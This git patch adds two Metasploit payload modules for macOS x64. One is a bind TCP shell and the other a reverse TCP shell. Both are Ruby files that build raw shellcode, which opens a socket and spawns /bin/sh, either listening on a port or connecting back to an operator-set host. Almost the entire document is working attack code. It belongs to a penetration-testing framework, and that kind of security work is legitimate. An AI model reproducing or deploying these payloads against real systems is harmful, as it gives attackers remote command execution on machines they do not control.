From f5df7e0e8af375d1f2968840e0487ed193e05fb7 Mon Sep 17 00:00:00 2001 From: dcbz Date: Wed, 19 Sep 2012 16:59:26 -0500 Subject: [PATCH] Added 2 payload modules (reverse and bind tcp shells) --- .../singles/osx/x64/shell_bind_tcp.rb | 94 +++++++++++++++++++ .../singles/osx/x64/shell_reverse_tcp.rb | 88 +++++++++++++++++ 2 files changed, 182 insertions(+) create mode 100644 modules/payloads/singles/osx/x64/shell_bind_tcp.rb create mode 100644 modules/payloads/singles/osx/x64/shell_reverse_tcp.rb diff --git a/modules/payloads/singles/osx/x64/shell_bind_tcp.rb b/modules/payloads/singles/osx/x64/shell_bind_tcp.rb new file mode 100644 index 0000000000..5c51b902b6 --- /dev/null +++ b/modules/payloads/singles/osx/x64/shell_bind_tcp.rb @@ -0,0 +1,94 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + + +require 'msf/core' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Payload::Osx + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'OS X x64 Shell Bind TCP', + 'Version' => '$Revision$', + 'Description' => 'Bind an arbitrary command to an arbitrary port', + 'Author' => 'nemo ', + 'License' => MSF_LICENSE, + 'Platform' => 'osx', + 'Arch' => ARCH_X86_64, + 'Handler' => Msf::Handler::BindTcp, + 'Session' => Msf::Sessions::CommandShellUnix + )) + + # exec payload options + register_options( + [ + OptString.new('CMD', [ true, "The command string to execute", "/bin/sh" ]), + OptString.new('LPORT',[ true, "The port to bind to", "5555" ]), + ], self.class) + end + + # build the shellcode payload dynamically based on the user-provided CMD + def generate + cmd = (datastore['CMD'] || '') << "\x00" + port = [datastore['LPORT'].to_i].pack('n') + call = "\xe8" + [cmd.length].pack('V') + payload = + "\xB8\x61\x00\x00\x02" + # mov eax,0x2000061 + "\x6A\x02" + # push byte 0x1 + "\x5f" + # pop rdi + "\x6A\x01" + # push byte 0x1 + "\x5e" + # pop rsi + "\x48\x31\xD2" + # xor rdx,rdx + "\x0F\x05" + # loadall286 + "\x48\x89\xC7" + # mov rdi,rax + "\xB8\x68\x00\x00\x02" + # mov eax,0x2000068 + "\x48\x31\xF6" + # xor rsi,rsi + "\x56" + # push rsi + "\xBE\x00\x02" + port + # mov esi,0xb3150200 + "\x56" + # push rsi + "\x48\x89\xE6" + # mov rsi,rsp + "\x6A\x10" + # push 0x10 + "\x5A" + # pop rdx + "\x0F\x05" + # loadall286 + "\xB8\x6A\x00\x00\x02" + # mov eax,0x200006a + "\x48\x31\xF6" + # xor rsi,rsi + "\x48\xFF\xC6" + # inc rsi + "\x49\x89\xFC" + # mov r12,rdi + "\x0F\x05" + # loadall286 + "\xB8\x1E\x00\x00\x02" + # mov eax,0x200001e + "\x4C\x89\xE7" + # mov rdi,r12 + "\x48\x89\xE6" + # mov rsi,rsp + "\x48\x89\xE2" + # mov rdx,rsp + "\x48\x83\xEA\x04" + # sub rdx,byte +0x4 + "\x0F\x05" + # loadall286 + "\x48\x89\xC7" + # mov rdi,rax + "\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a + "\x48\x31\xF6" + # xor rsi,rsi + "\x0F\x05" + # loadall286 + "\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a + "\x48\xFF\xC6" + # inc rsi + "\x0F\x05" + # loadall286 + "\x48\x31\xC0" + # xor rax,rax + "\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b + call + # call CMD.len + cmd + # CMD + "\x48\x8b\x3c\x24" + # mov rdi, [rsp] + "\x48\x31\xD2" + # xor rdx,rdx + "\x52" + # push rdx + "\x57" + # push rdi + "\x48\x89\xE6" + # mov rsi,rsp + "\x0F\x05" # loadall286 + end +end diff --git a/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb b/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb new file mode 100644 index 0000000000..2baaa85529 --- /dev/null +++ b/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb @@ -0,0 +1,88 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + + +require 'msf/core' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Payload::Osx + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'OS X x64 Shell Reverse TCP', + 'Version' => '$Revision$', + 'Description' => 'Connect back to attacker and spawn a command shell', + 'Author' => 'nemo ', + 'License' => MSF_LICENSE, + 'Platform' => 'osx', + 'Arch' => ARCH_X86_64, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::CommandShellUnix + )) + + # exec payload options + register_options( + [ + OptString.new('CMD', [ true, "The command string to execute", "/bin/sh" ]), + OptString.new('LPORT',[ true, "The port to connect to", "5555" ]), + OptString.new('LHOST',[ true, "The host to connect to", "127.0.0.1" ]) + ], self.class) + end + + # build the shellcode payload dynamically based on the user-provided CMD + def generate + cmd = (datastore['CMD'] || '') << "\x00" + port = [datastore['LPORT'].to_i].pack('n') + ipaddr = [datastore['LHOST'].split('.').inject(0) {|t,v| (t << 8 ) + v.to_i}].pack("N") + + call = "\xe8" + [cmd.length].pack('V') + payload = + "\xB8\x61\x00\x00\x02" + # mov eax,0x2000061 + "\x6A\x02" + # push byte +0x2 + "\x5F" + # pop rdi + "\x6A\x01" + # push byte +0x1 + "\x5E" + # pop rsi + "\x48\x31\xD2" + # xor rdx,rdx + "\x0F\x05" + # loadall286 + "\x49\x89\xC4" + # mov r12,rax + "\x48\x89\xC7" + # mov rdi,rax + "\xB8\x62\x00\x00\x02" + # mov eax,0x2000062 + "\x48\x31\xF6" + # xor rsi,rsi + "\x56" + # push rsi + "\x48\xBE\x00\x02" + port + # mov rsi,0x100007fb3150200 + ipaddr + + "\x56" + # push rsi + "\x48\x89\xE6" + # mov rsi,rsp + "\x6A\x10" + # push byte +0x10 + "\x5A" + # pop rdx + "\x0F\x05" + # loadall286 + "\x4C\x89\xE7" + # mov rdi,r12 + "\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a + "\x48\x31\xF6" + # xor rsi,rsi + "\x0F\x05" + # loadall286 + "\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a + "\x48\xFF\xC6" + # inc rsi + "\x0F\x05" + # loadall286 + "\x48\x31\xC0" + # xor rax,rax + "\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b + call + # call CMD.len + cmd + # CMD + "\x48\x8B\x3C\x24" + # mov rdi,[rsp] + "\x48\x31\xD2" + # xor rdx,rdx + "\x52" + # push rdx + "\x57" + # push rdi + "\x48\x89\xE6" + # mov rsi,rsp + "\x0F\x05" # loadall286 + end +end